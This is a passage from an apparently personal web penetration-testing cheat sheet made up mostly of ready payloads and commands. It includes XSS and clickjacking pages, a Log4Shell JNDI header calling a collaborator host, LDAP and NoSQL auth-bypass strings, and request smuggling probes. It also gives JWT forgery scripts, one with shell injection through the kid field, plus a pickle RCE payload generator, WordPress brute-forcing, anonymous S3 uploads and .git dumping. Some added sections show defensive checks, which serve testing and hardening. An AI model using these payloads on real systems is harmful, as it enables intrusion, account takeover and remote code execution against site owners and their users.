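    if any(c in filename for c in ("\x00", "/", "\\")):
        raise ValueError("control or path characters in filename")
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED:
        raise ValueError(f"extension {ext!r} not allowed")
    if not data.startswith(ALLOWED[ext]):
        raise ValueError("content does not match extension")
    return secrets.token_hex(16) + ext


def hardened_rejects(filename: str, content_type: str, data: bytes) -> bool:
    try:
        accept_hardened(filename, content_type, data)
    except ValueError:
        return True
    return False
```

The exiftool trick above (PHP in a JPEG comment, renamed to .php.jpeg) passes the magic-bytes check by design; what stops it here is that the file is stored as <random>.jpg, so nothing will ever hand it to the PHP interpreter.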
<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<p>Website is vulnerable to clickjacking!</p>
<iframe src="https://domain_to_test/" width="500" height="500"></iframe>
</body>
</html>
Clickjacking to XSS :-)
<b onmouseover=alert('Wufff!')>click me!</b>
<isindex x="javascript:" onmouseover="alert(XSS)">click me!
<input type="text" value="" Onblur=alert(666) size="30">
<meter value=2 min=0 max=10 onmouseover=alert(1)>2 out of 10</meter>
<img ismap= itemtype='yyy style=width:100%;height:100%;position:fixed;left:0px;top:0px; onmouseover=alert(/XSS/)//'>
<img ismap=itemtype=yyy style=width:100%;height:100%;position:fixed;left:0px;top:0px; onmouseover=alert(/XSS/)//>
<a href="#" onclick="alert(1)"> //If the user clicks in the next <a> the alert will be executed
Example:
We have a URL like this -> http://localhost:8080/bankLOLZ/?sessionID=34564KINIU2UV24U3V4QWDE33T
If the application accepts a session ID supplied in the URL and keeps it after login, we craft our own sessionID (swap some digits or letters) and send the link to the victim. The victim logs in through our URL, so the session bound to our sessionID is now authenticated. We then send a GET request with Burp, carrying the same sessionID, to somewhere inside the app:
-> http://localhost:8080/bankLOLZ/accountManagement/victims_name
And we are in the web app with the victim's account.
python jexboss.py -u https://domain/index.action
# Try in different headers
X-Api-Version: ${jndi:ldap://127.0.0.1.COLLABORATOR_URL}
# BURP EXTENSION
https://portswigger.net/bappstore/186be35f6e0d418eb1f6ecf1cc66a74d
CLI - TOOL
--> example.php?name=hacker&password=hacker
Inverted filters giving different results confirm the injection
--> example.php?name=*)(objectClass=*&password=hacker
--> example.php?name=*)(!(objectClass=*)&password=hacker
# auth bypass (the %00 truncates the rest of the filter)
--> example.php?name=hacker)(cn=*))%00&password=hacker
Host: example.com -> Host: microsoft.com
Web servers handle a duplicated Host header differently: NGINX uses the last one to route the request, Apache/IIS concatenate them.
Host: example.com
Host: microsoft.com
Host: example.com
X-Forwarded-Host: microsoft.com
https://portswigger.net/blog/practical-web-cache-poisoning
GET /en?dontpoisoneveryone=1 HTTP/1.1
Host: www.redhat.com
X-Forwarded-Host: a."><script>alert(1)</script>
HTTP/1.1 200 OK
Cache-Control: public, no-cache
…
<meta property="og:image" content="https://a."><script>alert(1)</script>"/>
https://s0cket7.com/open-redirect-vulnerability/
# If you end up on the external domain, it's vulnerable
/red.php?url=https://example.com
https://example.com
# Try injecting in the Referer header
Referer: http://sexy_malicious_hacker.com
Referer: https://www.qualys.com
https://portswigger.net/web-security/request-smuggling
# smuggler.py is a small tool used to test for it
python smuggler.py -h
# Send the probe twice; the desync shows up in the second response
# CL.TE: front-end honours Content-Length (13 = "0\r\n\r\nSMUGGLED"), back-end honours Transfer-Encoding and leaves SMUGGLED in the buffer
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED
# TE.CL: front-end honours Transfer-Encoding, back-end honours Content-Length (3 = "8\r\n") and leaves the rest in the buffer
POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

# CL.TE: the leftover "G" is prepended to the next (victim) request, so the back-end sees a GPOST method
POST / HTTP/1.1
Host: example.com
Content-Length: 6
Transfer-Encoding: chunked

0

GPOST / HTTP/1.1
Host: example.com
# TE.CL: the back-end reads only "6\r\n" and treats PREFIX... as the start of the next request
POST / HTTP/1.1
Host: example.com
Content-Length: 3
Transfer-Encoding: chunked

6
PREFIX
0

POST / HTTP/1.1
Host: example.com
# Hiding our Transfer-encoding
Transfer-Encoding: xchunked
Transfer-Encoding : chunked
Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding:[tab]chunked
GET / HTTP/1.1
Transfer-Encoding: chunked
X: X[\n]Transfer-Encoding: chunked
Transfer-Encoding
: chunked
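# Added example, not from the original notes: builds the CL.TE and TE.CL probes above with the Content-Length computed rather than hand-counted, then frames the same bytes the way a Content-Length-only hop and a chunked-only hop would, so the desync (the bytes left over in front of the next request) is visible offline. Host names are constructed.

```python
from typing import List, Optional, Tuple

Headers = List[Tuple[str, str]]


def build(method: str, host: str, headers: Headers, body: bytes) -> bytes:
    """Serialise a request; headers is a list so duplicate or odd headers are expressible."""
    lines = [f"{method} / HTTP/1.1", f"Host: {host}"] + [f"{k}: {v}" for k, v in headers]
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + body


def cl_te_probe(host: str, smuggled: bytes = b"SMUGGLED") -> bytes:
    """Content-Length covers the whole body; a chunked parser stops at the 0 chunk."""
    body = b"0\r\n\r\n" + smuggled
    return build("POST", host, [("Content-Length", str(len(body))),
                                ("Transfer-Encoding", "chunked")], body)


def te_cl_probe(host: str, smuggled: bytes = b"SMUGGLED") -> bytes:
    """Content-Length covers only the chunk-size line; a chunked parser reads it all."""
    size_line = f"{len(smuggled):x}\r\n".encode()
    body = size_line + smuggled + b"\r\n0\r\n\r\n"
    return build("POST", host, [("Content-Length", str(len(size_line))),
                                ("Transfer-Encoding", "chunked")], body)


def _header(head: bytes, name: bytes) -> Optional[bytes]:
    for line in head.split(b"\r\n")[1:]:
        key, sep, value = line.partition(b":")
        if sep and key.lower() == name:
            return value.strip()
    return None


def split_by_content_length(raw: bytes) -> Tuple[bytes, bytes]:
    """Framing by a Content-Length-only hop: (body, bytes left over for the next request)."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    length = int(_header(head, b"content-length") or b"0")
    return rest[:length], rest[length:]


def split_by_chunked(raw: bytes) -> Tuple[bytes, bytes]:
    """Framing of the same bytes by a Transfer-Encoding-only hop."""
    head, _, rest = raw.partition(b"\r\n\r\n")
    body = b""
    while True:
        size_line, _, rest = rest.partition(b"\r\n")
        size = int(size_line.strip(), 16)
        if size == 0:
            # terminating chunk: drop its CRLF; whatever follows belongs to the next request
            return body, (rest[2:] if rest.startswith(b"\r\n") else rest)
        body += rest[:size]
        rest = rest[size + 2:]   # skip the chunk data and its trailing CRLF


def is_ambiguous(raw: bytes) -> bool:
    """A front-end that forwards a request carrying both headers is the precondition for
    every variant above; rejecting such requests (RFC 7230 section 3.3.3) closes the hole."""
    head = raw.partition(b"\r\n\r\n")[0]
    return (_header(head, b"content-length") is not None
            and _header(head, b"transfer-encoding") is not None)
```

For the CL.TE probe the chunked side returns an empty body and b"SMUGGLED" left over, which is what gets glued onto the front of the next request on that connection; for the TE.CL probe the roles swap and the Content-Length side leaves b"SMUGGLED\r\n0\r\n\r\n" behind.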
# Request
Origin: http://domain_auditing.evil.net
# Response (origin reflected; only exploitable for reading authenticated data if Access-Control-Allow-Credentials: true comes back too)
Access-Control-Allow-Origin: http://domain_auditing.evil.net
# Preflight request
OPTIONS / HTTP/1.1
Origin: http://example.com
Access-Control-Request-Method: DELETE
# Response
Access-Control-Allow-Origin: http://example.com
Access-Control-Allow-Methods: PUT, POST, DELETE
# Bypass restrictions using parameter pollution
# You can use the same parameter several times
api.example/profile?UserId=123 # OK, your profile
api.example/profile?UserId=456 # ERROR
api.example/profile?UserId=456&UserId=123 # OK, it can work (the authz check reads one copy, the data layer the other)
# Tips
# - Some encoded/hashed IDs can be predictable --> create several accounts and compare them
# - Try id, user_id, message_id... even if the application does not seem to offer them (on an API for example)
# - Parameter Pollution (HPP)
# - Switch between POST and PUT to bypass potential controls
https://epi052.gitlab.io/notes-to-self/blog/2019-03-13-how-to-test-saml-a-methodology-part-two/
https://github.com/anouarbensaad/vulnx
- Tomcat
/examples/jsp/%252e%252e/%252e%252e/manager/html
tomcat tomcat
admin
admin manager
admin password
admin s3cret
- Multipurpose
https://github.com/Tuhinshubhra/CMSeeK
https://github.com/Dionach/CMSmap
- Wordpress
# Enumerate users (u) and all plugins (ap)
wpscan --url http://ip/wp/ -e u,ap
# Bruteforce login
wpscan --url IP -U admin -P /usr/share/wordlists/rockyou.txt --max-threads 50
# 404.php path reminder (I always forget xd)
http://10.10.252.204/wp-content/themes/twentyfifteen/404.php
https://gf.dev/wordpress-security-scanner
https://sitecheck.sucuri.net/
https://github.com/m4ll0k/WPSeku
https://github.com/Jamalc0m/wphunter
https://github.com/10up/wp-vulnerability-scanner
https://github.com/RamadhanAmizudin/Wordpress-scanner
- Joomla
#https://github.com/drego85/JoomlaScan
python joomlascan.py -u URL
# Scan Joomla (a Docker image is available)
joomlavs --url www.monsite.com -v
# Enumeration
joomlavs --url www.monsite.com -a # All
joomlavs --url www.monsite.com -c # Components
joomlavs --url www.monsite.com -m # Modules
joomlavs --url www.monsite.com -t # Templates
joomlavs --url www.monsite.com -q # Quiet: fully passive
- Drupal
https://github.com/droope/droopescan
./droopescan scan drupal -u http://example.org/ -t 32
Request:
/%0d%0aLocation:%20http://myweb.com
Response:
Location: http://myweb.com
http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
The difference between a WebSocket and an HTTP request: a WebSocket keeps the connection open and either side can push messages at any time; HTTP sends a request, gets a response, and is done.
# Manipulating WebSocket messages to exploit vulnerabilities
# Send a message from the UI; the client-side JS usually HTML-encodes it, so edit the frame in Burp (WebSockets history / Repeater) and resend the raw payload:
{"message":"<img src=1 onerror='alert(1)'>"}
# Manipulating the WebSocket handshake to exploit vulnerabilities
# In some cases the WebSocket messages are filtered
{"error":"Attack detected: Event handler"}
# If your IP gets blacklisted try to add the following in the request :P
X-Forwarded-For: 1.1.1.1
# Then just try with some XSS bypasses
<iframe src='jAvAsCripT:alert`1`'></iframe>
# Automated tool and exploitation helper
https://github.com/ticarpi/jwt_tool
# Make sure to add == padding if needed when decoding, and remove it again when pasting into Burp.
# Cookie auth: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRyM21iMCIsImlhdCI6IjE1ODM1MzE4NjQifQ==.MjM0ZDRlMTM3YWZkZWRiYTliYWM3ZWUyZDk5ZmE3MTViYm Y4NWM1NzA5ZTUwMTkxYjY3NDFiNzkwNjk0NWQxOA
# Decodes to:
{"alg":"HS256","typ":"JWS"}.{"login":"tr3mb0","iat":"1583531864"}.234d4e137afdedba9bac7ee2d99fa715bbf85c5709e50191b6741b7906945d1OA
# Change the header to alg none and the claims to admin; a verifier that honours the header's alg skips the signature check, so the old signature can stay as it is:
{"alg":"None","typ":"JWS"}.{"login":"admin","iat":"1583531864"}.234d4e137afdedba9bac7ee2d99fa715bbf85c5709e50191b6741b7906945d1OA
# Encode again & admin! 8-)
# Cracking JWT secret, HS256 algorithm.
https://github.com/brendan-rius/c-jwt-cracker
# Hashcat - dicc
hashcat -a0 -m 16500 hash.txt dicc.txt
# Hashcat pure bruteforce
hashcat -a3 -m 16500 hash.txt
# After retrieving the secret, let's forge our JWT to authenticate as ADMIN.
# From terminal run:
gem install jwt
irb
require 'jwt'
payload = {"user":"admin"}
JWT.encode payload, "your_secret_here", "HS256"
# GG!
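# Added example, not from the original notes, covering both the alg none trick and the HS256 secret attack above: forge tokens, verify them with a server that honours the header's alg versus one that pins HS256, and run the dictionary attack hashcat -m 16500 performs. The secret and claims are constructed.

```python
import base64
import hashlib
import hmac
import json
from typing import Iterable, Optional


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def sign_hs256(signing_input: str, secret: str) -> str:
    return b64url(hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest())


def forge(header: dict, payload: dict, secret: str = "") -> str:
    """Encode header.payload and sign it; alg none gets an empty signature."""
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode()) + "." +
                     b64url(json.dumps(payload, separators=(",", ":")).encode()))
    alg = str(header.get("alg", "")).lower()
    sig = "" if alg == "none" else sign_hs256(signing_input, secret)
    return f"{signing_input}.{sig}"


def verify_vulnerable(token: str, secret: str) -> Optional[dict]:
    """Trusts the alg in the attacker-controlled header: 'none' skips the check entirely."""
    h, p, sig = token.split(".")
    header = json.loads(b64url_decode(h))
    if str(header.get("alg", "")).lower() == "none":
        return json.loads(b64url_decode(p))
    if hmac.compare_digest(sig, sign_hs256(f"{h}.{p}", secret)):
        return json.loads(b64url_decode(p))
    return None


def verify_hardened(token: str, secret: str) -> Optional[dict]:
    """Pins the algorithm server-side; whatever the header claims is irrelevant."""
    h, p, sig = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":
        return None
    if not hmac.compare_digest(sig, sign_hs256(f"{h}.{p}", secret)):
        return None
    return json.loads(b64url_decode(p))


def crack_hs256(token: str, candidates: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack on the signature, the same work hashcat -m 16500 does."""
    h, p, sig = token.split(".")
    for secret in candidates:
        if hmac.compare_digest(sig, sign_hs256(f"{h}.{p}", secret)):
            return secret
    return None
```

Once crack_hs256 returns the secret, forge({"alg": "HS256"}, {"user": "admin"}, secret) produces the same token the irb snippet above does.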
# KID parameter injection: kid tells the server which key to verify with, often by reading a file or a DB row.
# If it is used as a file path, point it at an empty file (/dev/null) and sign with the empty key.
import base64
import hashlib
import hmac
import json

header = {"typ":"JWT","alg":"HS256","kid":"../../../../../../../../../../dev/null"}
key = ""   # /dev/null reads as an empty key
payload = {"user":"admin"}

def b64url(data):
    return base64.urlsafe_b64encode(data).decode('utf8').rstrip("=")

token = b64url(json.dumps(header).encode('utf8')) + "." + b64url(json.dumps(payload).encode('utf8'))
sig = b64url(hmac.new(key.encode('utf8'), token.encode('utf8'), hashlib.sha256).digest())
print(token + "." + sig)
Rather than admin access, the kid may give us RCE when the server hands it to a shell.
# eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiIsImtpZCI6IjAwMDEifQ.eyJ1c2VyIjpudWxsfQ.spzCikhspCdf6XAUci3R4EpJOH6gvZcvkDCVrkGbx7Y
# {"typ":"JWT","alg":"HS256","kid":"0001"}.{"user":null}.<raw HMAC bytes>
import base64
import hashlib
import hmac
import json

header = {"typ":"JWT","alg":"HS256","kid":"|whoami"}   # piped into whatever command consumes kid
payload = {"user":"whatevah"}
key = "lmaowtf"   # the signature does not matter if the command runs before verification

def b64url(data):
    return base64.urlsafe_b64encode(data).decode('utf8').rstrip("=")

token = b64url(json.dumps(header).encode('utf8')) + "." + b64url(json.dumps(payload).encode('utf8'))
sig = b64url(hmac.new(key.encode('utf8'), token.encode('utf8'), hashlib.sha256).digest())
print(token + "." + sig)
https://srcincite.io/blog/2017/04/27/from-serialized-to-shell-auditing-google-web-toolkit.html#research
Formatted (Modern versions)
{"query":"query IntrospectionQuery {\r\n __schema {\r\n queryType { name }\r\n mutationType { name }\r\n subscriptionType { name }\r\n types {\r\n ...FullType\r\n }\r\n directives {\r\n name\r\n description\r\n args {\r\n ...InputValue\r\n }\r\n locations\r\n }\r\n }\r\n }\r\n\r\n fragment FullType on __Type {\r\n kind\r\n name\r\n description\r\n fields(includeDeprecated: true) {\r\n name\r\n description\r\n args {\r\n ...InputValue\r\n }\r\n type {\r\n ...TypeRef\r\n }\r\n isDeprecated\r\n deprecationReason\r\n }\r\n inputFields {\r\n ...InputValue\r\n }\r\n interfaces {\r\n ...TypeRef\r\n }\r\n enumValues(includeDeprecated: true) {\r\n name\r\n description\r\n isDeprecated\r\n deprecationReason\r\n }\r\n possibleTypes {\r\n ...TypeRef\r\n } \r\n } \r\n \r\n fragment InputValue on __InputValue {\r\n name\r\n description\r\n type { ...TypeRef }\r\n defaultValue\r\n } \r\n \r\n fragment TypeRef on __Type {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n ofType {\r\n kind\r\n name\r\n }\r\n }\r\n } \r\n \r\n }"}
GraphQL Raider (Modern Versions) ( check "query" tag on formatted query )
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
directives {
name
description
args {
...InputValue
}
locations
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type { ...TypeRef }
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
GraphQL Raider (Older Versions) ( check "query" tag on formatted query )
query IntrospectionQuery {
__schema {
queryType { name }
mutationType { name }
subscriptionType { name }
types {
...FullType
}
directives {
name
description
args {
...InputValue
}
onOperation
onFragment
onField
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type { ...TypeRef }
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
From the introspection output above we saw:
"name":"whatever",
*snip*
"kind":"OBJECT"
"name":"WhatEver"
Let's get info from that type (query its scalar fields):
{"operationName":"whatever","variables":{"offset":10},"query":"query whatever($offset: Int) {\n whatever(offset: $offset, limit: 10) {\n id\n value\n __typename\n }\n}\n"}
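Added example (not from the original notes): a small parser for the JSON that the IntrospectionQuery above returns. It resolves the nested ofType wrappers of the TypeRef fragment into SDL notation, lists the query-root fields with their arguments and deprecation flag (the reason the query asks for includeDeprecated: true), and builds the scalar selection set used in the "whatever" query above. SAMPLE is a constructed response; the type and field names in it are invented.

```python
import json

# Constructed introspection response in the shape the IntrospectionQuery above returns;
# the type and field names are invented for this example.
S = {"kind": "SCALAR", "ofType": None}
SAMPLE = json.dumps({"data": {"__schema": {"queryType": {"name": "Query"}, "types": [
    {"kind": "OBJECT", "name": "Query", "fields": [
        {"name": "whatever", "isDeprecated": False,
         "args": [{"name": "offset", "type": dict(S, name="Int")},
                  {"name": "limit", "type": {"kind": "NON_NULL", "name": None, "ofType": dict(S, name="Int")}}],
         "type": {"kind": "LIST", "name": None,
                  "ofType": {"kind": "OBJECT", "name": "WhatEver", "ofType": None}}},
        {"name": "legacyDump", "isDeprecated": True, "args": [], "type": dict(S, name="String")}]},
    {"kind": "OBJECT", "name": "WhatEver", "fields": [
        {"name": "id", "isDeprecated": False, "args": [],
         "type": {"kind": "NON_NULL", "name": None, "ofType": dict(S, name="ID")}},
        {"name": "value", "isDeprecated": False, "args": [], "type": dict(S, name="String")},
        {"name": "owner", "isDeprecated": False, "args": [],
         "type": {"kind": "OBJECT", "name": "User", "ofType": None}}]}]}}})

def type_ref(t):
    """Render a TypeRef in SDL notation, unwrapping the nested ofType wrappers."""
    if t["kind"] == "NON_NULL":
        return type_ref(t["ofType"]) + "!"
    if t["kind"] == "LIST":
        return "[" + type_ref(t["ofType"]) + "]"
    return t["name"]

def named(t):
    """Return the innermost named type of a TypeRef."""
    return named(t["ofType"]) if t["ofType"] else t

def root_fields(introspection):
    """Map each query-root field to (SDL signature, isDeprecated)."""
    schema = json.loads(introspection)["data"]["__schema"]
    types = {t["name"]: t for t in schema["types"]}
    out = {}
    for f in types[schema["queryType"]["name"]]["fields"]:
        args = ", ".join(f"{a['name']}: {type_ref(a['type'])}" for a in f["args"])
        sig = f"{f['name']}({args})" if args else f["name"]
        out[f["name"]] = (f"{sig}: {type_ref(f['type'])}", f["isDeprecated"])
    return out

def scalar_selection(introspection, typename):
    """Scalar/enum fields of a type: the selection set used for 'whatever' above (id, value)."""
    schema = json.loads(introspection)["data"]["__schema"]
    t = next(x for x in schema["types"] if x["name"] == typename)
    return [f["name"] for f in t["fields"] if named(f["type"])["kind"] in ("SCALAR", "ENUM")]
```

Deprecated fields are worth a second look when auditing your own API: they usually keep working but are rarely covered by the current authorization tests.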
# Auth bypass - NoSQLi
Normal sql: ' or 1=1-- -
Mongo sql: ' || 1==1// or ' || 1==1%00
---------------------
# Auth bypass
# in URL
username[$ne]=toto&password[$ne]=toto
username[$exists]=true&password[$exists]=true
# in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
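Added example (not from the original notes) showing why the payloads above log in as the first user: a login handler that passes the parsed body into the filter honours the $ne / $exists operators, while the hardened version only lets plain strings reach the query. The Mongo operator semantics are re-implemented in match_field for the two operators used here, and parse_bracket_qs mimics how the qs library used by Express turns username[$ne]=toto into a nested object. USERS, the function names and the credentials are constructed for this example.

```python
import re

# Constructed user store standing in for a MongoDB collection (example data, not real credentials).
USERS = [{"username": "alice", "password": "hunter2"},
         {"username": "bob", "password": "s3cret"}]

def match_field(value, cond):
    """Evaluate one field condition the way MongoDB does for the operators in the payloads above."""
    if not isinstance(cond, dict):        # plain equality, e.g. {"username": "alice"}
        return value == cond
    for op, arg in cond.items():
        if op == "$ne":
            if value == arg:
                return False
        elif op == "$exists":
            if (value is not None) != (arg in (True, "true", 1)):
                return False
        else:
            raise ValueError(f"operator {op} not modelled in this example")
    return True

def find_one(query):
    """Return the first user matching every field of the query filter, or None."""
    return next((u for u in USERS if all(match_field(u.get(k), v) for k, v in query.items())), None)

def login_vulnerable(body):
    """Passes the parsed request body straight into the filter, so operator objects are honoured."""
    return find_one({"username": body.get("username"), "password": body.get("password")})

def login_hardened(body):
    """Only plain strings reach the filter; an object or array in either field is rejected."""
    u, p = body.get("username"), body.get("password")
    if not isinstance(u, str) or not isinstance(p, str):
        return None
    return find_one({"username": u, "password": p})

def parse_bracket_qs(qs):
    """Mimic qs-style parsing (as used by Express): a[$ne]=x becomes {"a": {"$ne": "x"}}."""
    out = {}
    for pair in qs.split("&"):
        key, _, val = pair.partition("=")
        m = re.fullmatch(r"(\w+)\[(\$\w+)\]", key)
        if m:
            out.setdefault(m.group(1), {})[m.group(2)] = val
        else:
            out[key] = val
    return out
```

Type-checking (or a sanitizer that strips keys starting with $) is the fix on the server; the same check also makes a good detection rule, since a legitimate login never sends an object for username.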
https://github.com/aws/aws-cli
# Find AWS bucket
//xyz.s3.amazonaws.com/obappm13cw00/optimy/print.css
# Connect without creds and list
aws s3 ls s3://xyz --no-sign-request
# Upload file without creds
aws s3 mv hacked.txt s3://xyz/hacked.txt --no-sign-request
# Connect with creds
aws configure
https://github.com/RhinoSecurityLabs/pacu
> set_keys
> list
### GoSpider ###
https://github.com/jaeles-project/gospider
# Also get URLs from 3rd party (Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com)
gospider -s "https://google.com/" -o output -c 10 -d 1 --other-source
# Add cookies
-H "Accept: */*" -H "Test: test" --cookie "testA=a; testB=b"
### LINKFINDER ###
# STEP 1
After your normal crawling through the web, right click your domain -> Engagement tools -> Find scripts -> export
# STEP 2
Download and install:
https://github.com/GerbenJavado/LinkFinder
# STEP 3
python linkfinder.py -i burpfile -b
As an alternative to Burp Suite (analyze the entire domain and its JS):
python linkfinder.py -i https://example.com -d
https://github.com/bryanroma/ECB_pwnage
https://waf-bypass.com/
# WAFWOOF
wafw00f https://example.com
# IDENTYWAF
https://github.com/stamparm/identYwaf
# Your target is behind a WAF? Do you need to find the real IP? Fear no more
# Go to the website and search by host:
https://crt.sh/ -> subdomain.domain.com
# Click the `crt.sh ID`; you will see juicy info there. But let's
# copy the `SHA-256(Certificate)` and go to censys.io
# Search by `certificates`, paste the SHA-256 there, then on the right side click `explore`,
# then `IPv4 Hosts`, and with a bit of luck you will get the real IP behind the WAF
# -M : Tabbed output
# -A : Aggressive mode
# -P<filename> : Filename to write to the pre-shared key
# -d : Destination UDP port
ike-scan -M -A IP -d 500 --id=blop -Pkey
# Crack key
psk-crack -d /usr/share/wordlists/rockyou.txt key
https://labs.detectify.com/2021/08/10/how-to-hack-apis-in-2021/
# JSON API? Try to inject XML to achieve XXE
https://blog.netspi.com/playing-content-type-xxe-json-endpoints/
# Sometimes hidden parameters are set on pages
# You can use tools like Arjun to find them (https://github.com/s0md3v/Arjun)
python3 arjun.py -u https://api.example.com/endpoint --get
# Multi threading
python3 arjun.py -u https://api.example.com/endpoint --get -t 22
# Delay between requests (in seconds; 2 here is just an example value)
python3 arjun.py -u https://api.example.com/endpoint --get -d 2
# Found an API KEY?, let's check if it's valid somewhere
https://github.com/streaak/keyhacks
- Do not send the parameter related to the captcha
- Check if the value of the captcha is in the source code
- Check if the value is inside the cookie
- Check if you can send the correct value one time and use this value with the same sessionID
- Check manually or with a command how many images are being used and if only a few images are being used, detect them by MD5
- Use an OCR (https://github.com/tesseract-ocr/tesseract)
import argparse
from subprocess import check_output

import pytesseract
try:
    import Image            # very old PIL layout
except ImportError:
    from PIL import Image   # Pillow


def resolve(path):
    """Upscale the captcha with ImageMagick's convert (in place), then run Tesseract OCR on it."""
    print("Resampling the Image")
    check_output(['convert', path, '-resample', '600', path])
    return pytesseract.image_to_string(Image.open(path))


if __name__ == "__main__":
    argparser = argparse.ArgumentParser()
    argparser.add_argument('path', help='Captcha file path')
    args = argparser.parse_args()
    print('Resolving Captcha')
    captcha_text = resolve(args.path)
    print('Extracted Text', captcha_text.replace('\n', ''))
https://medium.com/secjuice/decode-bypass-captcha-9f17edf469b4
# Find real IP with shodan and Favicon
https://github.com/pielco11/fav-up.git
# Find backend with Favicon
https://github.com/devanshbatham/FavFreak
#!/usr/bin/python
#
# Pickle deserialization RCE payload (Python 2).
# To be invoked with the command to execute as its first parameter.
# Otherwise, the default one will be used.
#
import cPickle
import sys
import base64

DEFAULT_COMMAND = "whoami"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND


class PickleRce(object):
    # __reduce__ tells the unpickler to rebuild this object by calling os.system(COMMAND)
    def __reduce__(self):
        import os
        return (os.system, (COMMAND,))


print base64.b64encode(cPickle.dumps(PickleRce()))
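Defensive counterpart to the payload above, added here as an example (not from the original notes): the standard-library pattern of overriding Unpickler.find_class with an allow-list, so a pickle that names os.system, or any other global not on the list, is refused before the callable is resolved. SAFE_GLOBALS, ReduceProbe, roundtrip and demo are this example's own names; ReduceProbe uses the same __reduce__ trick as PickleRce but points it at the harmless os.getcwd.

```python
import io
import pickle

# Constructed allow-list: the only (module, name) globals a pickle may reference.
SAFE_GLOBALS = {("builtins", "set"), ("builtins", "frozenset"), ("collections", "OrderedDict")}

class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global not on the allow-list.

    The payload above works because loads() resolves os.system by name and then
    calls it with the attacker-chosen argument. find_class is the hook where that
    name lookup happens, so it is the place to refuse it.
    """
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")

def restricted_loads(data):
    """Drop-in replacement for pickle.loads with the allow-list applied."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

def roundtrip(obj):
    """Pickle a plain data object and load it back through the restricted unpickler."""
    return restricted_loads(pickle.dumps(obj))

class ReduceProbe:
    """Same trick as PickleRce above, but wired to a harmless callable for the test."""
    def __reduce__(self):
        import os
        return (os.getcwd, ())

def demo():
    """Return (benign object after restricted load, whether the reduce payload was blocked)."""
    benign = pickle.dumps({"user": "alice", "roles": ["admin"], "ids": {1, 2}})
    payload = pickle.dumps(ReduceProbe())
    try:
        restricted_loads(payload)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    return restricted_loads(benign), blocked
```

The allow-list is a mitigation for code that must keep accepting pickles; where the data format is yours to choose, a non-executable format such as JSON removes the problem entirely.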
# In case you find a .git repo:
./gitdumper.sh http://victim/.git/ local_dump
# Then, you might see a file called index; from that dir run:
git ls-files --stage
# Now you have a list of files and their object IDs; to read the source code run:
git cat-file -p object_id
# After checking the files, check the logs
git log
# If you find an interesting old commit
git revert COMMIT_HASH
apt-get install owasp-mantra-ff
http://randomiban.com/?country=Spain
https://www.privacytools.io/